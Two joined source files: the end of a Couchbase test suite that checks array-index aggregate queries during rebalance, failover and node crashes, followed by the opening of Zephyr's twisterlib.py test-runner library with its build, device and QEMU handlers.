mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
#check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
self._aggregate_query_using_index(index_names_defn)
except Exception, ex:
log.info(str(ex))
raise
def test_indexer_rebalance_out(self):
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], self.nodes_out_list)
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
# Check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
self._aggregate_query_using_index(index_names_defn)
except Exception, ex:
log.info(str(ex))
raise
def test_indexer_rebalance_in_out(self):
self.find_nodes_in_list()
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
# Check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
except Exception, ex:
log.info(str(ex))
raise
def test_server_crash(self):
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
self.targetProcess= self.input.param("targetProcess", 'memcached')
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
if self.targetProcess == "memcached":
remote.kill_memcached()
else:
remote.terminate_process(process_name=self.targetProcess)
self.sleep(60)
if "n1ql" not in self.nodes_out_dist:
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
mid_recovery_tasks.join()
#check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
except Exception, ex:
log.info(str(ex))
raise
def test_indexer_failover_add_back(self):
rest = RestConnection(self.master)
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
failover_task =self.cluster.async_failover([self.master],
failover_nodes=self.nodes_out_list,
graceful=self.graceful)
failover_task.result()
nodes_all = rest.node_statuses()
nodes = []
if self.nodes_out_list:
if self.nodes_out_list[0].ip == "127.0.0.1":
for failover_node in self.nodes_out_list:
nodes.extend([node for node in nodes_all if (str(node.port) == failover_node.port)])
else:
for failover_node in self.nodes_out_list:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
log.info("Adding back {0} with recovery type Full...".format(node.ip))
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id, recoveryType="full")
log.info("Rebalancing nodes in...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
#check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
except Exception, ex:
log.info(str(ex))
raise
def _create_array_index_definitions(self):
index_fields = [{"name": "name", "where_clause": "name = 'Kala'"},
{"name": "age", "where_clause": "age < 85"},
{"name": "debt", "where_clause": "debt > -500000"}]
indexes = []
for first_field in index_fields:
for second_field in index_fields:
if first_field == second_field:
continue
for third_field in index_fields:
if second_field == third_field or first_field == third_field:
continue
index_names_defn = {}
index_name = "{0}_{1}_{2}".format(first_field["name"], second_field["name"], third_field["name"])
index_names_defn["index_name"] = index_name
index_names_defn["fields"] = [first_field, second_field, third_field]
create_index_clause = "CREATE INDEX {0} on %s({1}, {2}, {3})".format(
index_name, first_field["name"], second_field["name"], third_field["name"])
drop_index_clause = "DROP INDEX %s.{0}".format(index_name)
index_names_defn["create_definitions"] = [(create_index_clause % bucket.name) for bucket in self.buckets]
index_names_defn["drop_definitions"] = [(drop_index_clause % bucket.name) for bucket in self.buckets]
for create_def in index_names_defn["create_definitions"]:
result = self.run_cbq_query(create_def)
indexes.append(index_names_defn)
return indexes
def _aggregate_query_using_index(self, index_names_defn):
failed_queries_in_result = []
for index_name_def in index_names_defn:
query_definitions = []
index_fields = index_name_def["fields"]
for aggr_func in AGGREGATE_FUNCTIONS:
select_clause = "SELECT " + aggr_func + "({0}) from %s where {1} GROUP BY {2}"
query_definitions = [select_clause.format(tup[0]["name"], tup[1]["where_clause"], index_fields[0]["name"])
for tup in itertools.permutations(index_fields)]
for bucket in self.buckets:
for query_definition in query_definitions:
query = query_definition % bucket.name
result = self.run_cbq_query(query)
query_verification = self._verify_aggregate_query_results(result, query_definition,
bucket.name)
if not query_verification:
failed_queries_in_result.append(query)
self.assertEqual(len(failed_queries_in_result), 0, "Failed Queries: {0}".format(failed_queries_in_result))
def _wait_until_cluster_is_healthy(self):
master_node = self.master
if self.targetMaster:
if len(self.servers) > 1:
master_node = self.servers[1]
rest = RestConnection(master_node)
is_cluster_healthy = False
count = 0
while not is_cluster_healthy and count < 10:
count += 1
cluster_nodes = rest.node_statuses()
for node in cluster_nodes:
if node.status != "healthy":
is_cluster_healthy = False
log.info("Node {0} is in {1} state...".format(node.ip,
node.status))
self.sleep(5)
break
else:
is_cluster_healthy = True
return is_cluster_healthy
def _verify_aggregate_query_results(self, result, query, bucket):
def _gen_dict(res):
result_set = []
if res is not None and len(res) > 0:
for val in res:
for key in val.keys():
result_set.append(val[key])
return result_set
self.restServer = self.get_nodes_from_services_map(service_type="n1ql")
self.rest = RestConnection(self.restServer)
self.rest.set_query_index_api_mode(1)
query = query % bucket
primary_result = self.run_cbq_query(query)
self.rest.set_query_index_api_mode(3)
self.log.info(" Analyzing Actual Result")
actual_result = _gen_dict(sorted(primary_result["results"]))
self.log.info(" Analyzing Expected Result")
expected_result = _gen_dict(sorted(result["results"]))
if len(actual_result) != len(expected_result):
return False
if actual_result != expected_result:
return False
return True
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
# Receive parameters from an runner_params field
# of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
# sometimes a test instance hasn't been executed successfully with no
# status, in order to include it into final report,
# so fill the results as blocked
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
